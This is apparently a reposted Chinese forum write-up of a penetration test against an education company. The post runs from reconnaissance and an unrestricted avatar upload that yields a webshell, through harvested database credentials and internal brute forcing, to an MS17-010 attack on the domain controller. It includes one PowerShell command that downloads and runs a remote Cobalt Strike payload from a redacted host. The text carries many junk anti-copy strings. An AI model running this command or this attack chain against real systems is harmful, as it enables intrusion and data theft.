这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路( T, x( h- e2 ?) m! {7 \! E
) B/ J1 u" I% w" O$ {9 S: W5 ~% y2 `6 U+ d, T. N( x) U- f% q* b
. b* r- @- l3 n 正文
+ B( @$ u# E" g' [8 f0 j( N9 d. J3 J' ?4 L/ k/ |) w
. ^$ B& L. I2 _' K5 A, x1 i) G- f3 G
目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
/ j% |( E9 s4 B( P' j
进行了简单的信息搜集
: h' X/ V6 F8 _5 |2 \/ S' D
I7 N' B$ J: a% D' D; J0 |: x
m* Z$ Z Z/ R! a1 n 子域名搜集
2 S& ^1 X9 m! p7 @$ |
9 X5 x$ y4 Y, k3 `$ a, d# e, W2 \+ L- V1 p
fofa找资产
9 v% b) }. ]$ {* K$ U4 f
2 O7 P) t, S/ y
$ f, `9 \/ x0 S; S! s1 D% i1 @7 x; @: o
一共七个资产。去重之后只有两个。
+ Y! K4 U8 M7 B/ }% V
目录探测. j) e' f5 O; e4 n; b p
" @/ v- Q) f# ^) U% W) E3 n, s e( S+ `
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& d5 v1 O' |0 R; e1 l
: o" `$ ]( A Q: F5 P
: U% t# D8 @! C/ q2 ], J- X- R
; D3 ?2 N7 j+ d! c$ A. I 我又尝试了通过修改返回包来绕过登录界面* b$ v$ Q* c( G! ^: G, [' c
5 g1 e8 k* F" t' y8 m: ~/ } |
" h% L* W3 [7 P3 t/ D9 j" N 还是不行,尝试注入无果
* e( m5 W! U9 w# U! J% p+ d ]* t& L
3 m" w4 M0 u, U$ `$ q. P
不过我目录探测出了一处Spring信息泄露
' C: S7 }* v1 O+ g! Z6 i
; ~% B( L& p" {8 V* p M
/ X5 E+ ]; _" x6 u% C$ c 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录7 Z8 y# o2 M5 J/ p: e
" Y1 D0 l: a0 f" L3 Y" e; W/ h+ H+ D0 }. z% P . G9 T8 J; I, ^
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
8 m/ M+ X0 ~6 O/ Y
# m+ \4 r8 s, J8 T; p, [ 获取有些师傅到这一步就手机抓包电脑测了。) F; v( A: K7 W1 M
K5 r1 p. e5 ]$ P" v! B: T$ g! L2 o# P W Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。& f* ~# S! x5 u; Z. p
其中在一个公众号发现了小程序,可以进行注册。
看到了头像上传,尝试上传获取WebShell9 F; j; i$ A4 z2 _, m$ t/ r0 F
8 i' a# I! F3 Q* k3 U; }* m' y
) n+ N2 h+ }5 p 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
; d2 S1 @0 \- q: j9 L* J0 X: {5 O9 s2 g0 J ~
' j, f0 z ?8 |1 b9 }( h( ]& X 然后上了大马
' h3 ^2 Z$ ^& c$ QX+ f: E4 ~- G8 J6 X& U* ]
& Q9 E5 N, M: P/ x4 k! n% I3 J+ l , Y8 Z! z3 ]" s3 B( @) X1 k. j
通过翻找文件发现数据库账号密码
8 [7 P$ @; | S% {) p
& I) e2 }; R N! |. r --内网渗透
直接通过powershell执行 cs上线+ ^ D/ b$ k% Q) B3 v! N
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"( M- d0 C( H$ T
0 v+ c$ l: q+ m& ?
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
6 P' R2 E9 D* o. w- [4 @ i8 b5 M" Z
; X! V, d6 ^$ x- `1 q+ e3 C0 ~
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
6 r X2 d) Y6 F6 Z6 |8 e. g
( I) p8 Y0 f$ B
/ Q* k a, j/ d# q- c
" ?1 ?8 c1 {6 s" |0 c
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! {7 n. x; S) ?; \4 y
: a6 I3 S' f0 n" n- W$ Q8 s
3 T" @, c) i3 B' z8 \( [* \ ) f* ]9 Z2 {. h& @% U4 ?
/ m% ^: F1 D) ^, |
& U& q7 l- V6 o8 |) ?" C8 F - _, [1 `, S& [
( A9 ]% l( @) m, e, l% w2 C1 _. W5 H1 ]1 F# e9 E 小结' B: r7 k9 k7 r1 e- m$ V& L8 P% Q
% Z! a8 f& D6 \" |: e
0 A. {) g, r7 Q* `- O- }/ P, B9 a0 c3 H 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!3 x+ }3 k. Y% B4 i
& ]% G" A0 K g7 ?6 J7 @7 O, R, k: v) Y. F! {- Z3 D4 K
" D2 z. @% k8 b: J1 s6 m作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html. |4 o2 |; y9 M$ h- _0 x9 F- o! y
9 Z+ K3 E1 H* z0 x0 z- ?6 v; Z" G# c* w( t) J7 E5 g
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |